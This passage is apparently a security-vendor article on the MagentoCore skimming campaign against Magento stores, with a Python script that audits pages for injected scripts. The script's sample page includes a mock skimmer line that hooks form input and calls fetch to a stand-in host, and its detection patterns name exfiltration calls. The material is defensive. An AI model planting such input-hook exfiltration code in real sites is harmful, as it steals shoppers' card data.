Security researcher Willem de Groot uncovered a hacking campaign that has so far affected more than 7,339 websites running on the Magento e-commerce platform. The attacks involve injecting MagentoCore (detected by Trend Micro as JS_MAGENTOSKIMMER.A), a malicious payment card data-stealing script, into the affected websites.
de Groot noted that the hacking campaign entails hijacking the control panel of Magento websites, often through brute-force techniques (successively trying combinations of credentials). Upon successfully gaining access to the content management system (CMS), hackers modify the website by embedding MagentoCore in its webpages. MagentoCore is designed to record keystrokes, which it sends to its command-and-control (C&C) server in real time. MagentoCore also searches the affected website for similar malware and deletes it, and modifies the passwords of user accounts on the website.
Based on de Groot’s scans, around 50 to 60 new Magento stores are being compromised per day, and the affected businesses include multinationals. A PublicWWW search also reveals that, as of this writing, there are 5,214 web pages containing MagentoCore. de Groot notes that MagentoCore affects at least 4.2 percent of Magento-based websites worldwide.
Given MagentoCore’s capabilities, its adverse impact is not limited to information theft. MagentoCore, for instance, drops a backdoor to auto-update as well as retrieve and run malicious code, then covers its tracks by deleting itself.
de Groot and other security researchers said that these attacks are part of a larger cybercriminal campaign operated by the MageCart group, which has reportedly been active as far back as 2015. MagentoCore, its C&C server, and the tactics used were linked to different groups working under MageCart. Last July, researchers traced the data breach of U.K.-based Ticketmaster to MageCart. The hackers hijacked the third-party components integrated into Ticketmaster’s websites and modified them with credit card-skimming code. de Groot said MageCart also targets the WooCommerce e-commerce plugin in WordPress.
MagentoCore exemplifies the significance of security by design: safeguarding the underlying infrastructure and components used to run websites or applications. This is especially true for businesses adopting DevOps, where the need to deploy software as fast as possible often takes precedence over security. While enriching the user and customer experience, and keeping the website, software, or application up and running, helps bring in more business, security shouldn’t be an afterthought. For DevOps teams, this means security as code: baking security early into the development process to avoid unnecessary work, significantly reduce disruptions, and address gaps faster.
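One concrete form of "security as code" for a storefront is an automated check of the rendered pages for script tags that were not there at deployment time, which is how an injected skimmer like the one described above shows up. The following is an added example, not code from Trend Micro or de Groot; the allowlisted hosts, the sample page HTML, and the inline-script heuristics are constructed assumptions for illustration.

```python
"""Audit a storefront page for script tags loaded from hosts outside an
allowlist and for inline scripts that hook form input and send it out.
Added example; allowlist and sample HTML are constructed, not from the article."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this shop legitimately serves scripts from (assumed per deployment).
ALLOWED_SCRIPT_HOSTS = {"shop.example", "static.shop.example"}

# Inline-script heuristics: hooks on input events combined with an outbound call.
INPUT_HOOK = re.compile(r"addEventListener\s*\(\s*['\"](keyup|keydown|input|change|submit)['\"]", re.I)
EXFIL_CALL = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|new\s+Image)\b", re.I)

class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self.inline.append("")
    def handle_data(self, data):
        if self._in_script:
            self.inline[-1] += data  # script bodies may arrive in several chunks
    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

def audit_page(html, page_host):
    """Return (kind, detail) findings for one page; empty list means clean."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:
        host = urlparse(src).hostname or page_host  # relative src is first-party
        if host not in ALLOWED_SCRIPT_HOSTS:
            findings.append(("unexpected-script-host", host))
    for body in p.inline:
        if INPUT_HOOK.search(body) and EXFIL_CALL.search(body):
            findings.append(("inline-input-hook-with-exfil", body.strip()[:60]))
    return findings

# Constructed sample: two legitimate scripts, one foreign script, one inline hook.
SAMPLE_PAGE = """<html><head>
<script src="/static/frontend/requirejs/require.js"></script>
<script src="https://static.shop.example/mage/checkout.js"></script>
<script src="https://js-host.example/skim.js"></script>
<script>document.addEventListener('input', function(e){ fetch('https://js-host.example/c'); });</script>
<script>require(['jquery'], function($){ $(function(){}); });</script>
</head></html>"""

if __name__ == "__main__":
    for kind, detail in audit_page(SAMPLE_PAGE, "shop.example"):
        print(kind, detail)
```

Run it against a stored copy of each storefront page on a schedule and alert on any finding; pairing it with a baseline hash of every known script body catches modified first-party files as well.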
For DevOps teams and website, IT, and system administrators, here are some best practices for defending against threats such as MagentoCore: